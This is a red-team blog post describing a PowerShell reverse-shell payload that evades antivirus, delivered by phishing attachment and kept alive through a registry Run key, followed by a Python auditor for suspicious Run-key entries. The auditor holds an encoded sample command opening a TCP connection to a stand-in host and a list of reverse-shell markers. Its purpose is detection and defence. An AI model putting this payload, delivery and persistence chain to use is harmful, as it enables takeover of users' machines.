Emerging Threats

Red Teaming Series — Antivirus Bypass

frtg · 2 min read

We constructed a malicious payload that evaded detection by all 55 antivirus engines on the VirusTotal platform:


Lab Preparation

  • Windows 10 “victim” (with Firewall and AntiVirus active)
  • Windows 10 “attacker” with the CommandoVM framework

Attacker Set-Up

We used a PowerShell script (ReverseTCP Shell – link) to generate the payload:

The script produces two distinct outputs: a PowerShell command and an equivalent CMD command:


Attack Execution

The generated command can be embedded in a “.vbs” file or in a Microsoft Office document. Users routinely receive emails carrying attachments of exactly this type:


Antivirus Ineffectiveness

Even when the user runs an antivirus scan, no threat is detected and no alert is raised:

Once the document is opened, the attacker gains full control of the workstation with the privileges of the compromised user: uploading and downloading files on the target system, capturing screenshots, and carrying out other post-exploitation actions. Our Managed SOC teams have observed this pattern across multiple intrusion campaigns:

Persistence

To keep access to the victim system, the payload must run at every system startup. Several techniques achieve this; one of them is to place the command in a registry autostart (Run) key:

By replacing “calc.exe” with the previously generated command, the attacker regains control of the workstation at every restart without triggering any detection alert. The chain combines T1566.002 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys) and T1059.001 (Command and Scripting Interpreter: PowerShell), and it shows that signature-based defenses alone are insufficient against obfuscated, multi-stage payload delivery.
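The defender's counterpart to this persistence step is auditing what the Run keys actually launch. The Python below is an added example, not code from the original post or from the ReverseTCP Shell script: it scores Run-key command lines (as exported from the registry or delivered as EDR telemetry) for the traits described above, namely PowerShell or a script host started at logon, stealth flags, and an encoded command that decodes to reverse-TCP or download-cradle fragments. The sample value names, paths and the 192.0.2.10 address are constructed for illustration.

```python
import base64

SCRIPT_HOSTS = {"powershell.exe", "powershell", "pwsh.exe", "pwsh"}
LOLBIN_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
STEALTH_FLAGS = {"-nop", "-noprofile", "-w", "-windowstyle", "-ep", "-executionpolicy",
                 "-noni", "-noninteractive"}
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
# Fragments typical of PowerShell reverse-TCP shells and download cradles.
PAYLOAD_MARKERS = ("net.sockets.tcpclient", "downloadstring", "invoke-expression", "iex",
                   "frombase64string")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample Run-key values (value name -> command line), not taken from a real host.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -nop -w hidden -ep bypass -enc "
               + encode_ps("$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444)"),
    "Helper": r"wscript.exe //B C:\Users\u\AppData\Roaming\helper.vbs",
    "calc": "calc.exe",
}


def decode_encoded_command(tokens):
    """Return the script following an -EncodedCommand style flag, or '' if absent/undecodable."""
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def classify_run_value(cmd: str):
    """Score one autorun command line; returns (score, reasons). Score >= 2 deserves review."""
    tokens = cmd.split()
    if not tokens:
        return 0, []
    low = [t.lower().strip('"') for t in tokens]
    exe = low[0].rsplit("\\", 1)[-1]          # bare executable name, without path
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append("PowerShell launched from a Run key (T1059.001 via T1547.001)")
    if exe in LOLBIN_HOSTS:
        reasons.append(f"script host {exe} launched from a Run key")
    if any(t.endswith(".vbs") for t in low):
        reasons.append(".vbs file referenced from a Run key")
    hits = STEALTH_FLAGS & {t for t in low if t.startswith("-")}
    if hits:
        reasons.append("stealth flags: " + " ".join(sorted(hits)))
    decoded = decode_encoded_command(tokens)
    if decoded:
        found = [m for m in PAYLOAD_MARKERS if m in decoded.lower()]
        reasons.append("encoded command decoded" + (", markers: " + ", ".join(found) if found else ""))
    return len(reasons), reasons


def audit(run_values):
    """Return {name: (score, reasons)} for every Run-key value scoring 2 or more."""
    scored = {name: classify_run_value(cmd) for name, cmd in run_values.items()}
    return {name: result for name, result in scored.items() if result[0] >= 2}
```

On a live host the same function can be fed the output of `Get-ItemProperty` on the HKCU and HKLM `...\CurrentVersion\Run` keys; the decoded script, not the base64 blob, is what a signature or analyst should inspect.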
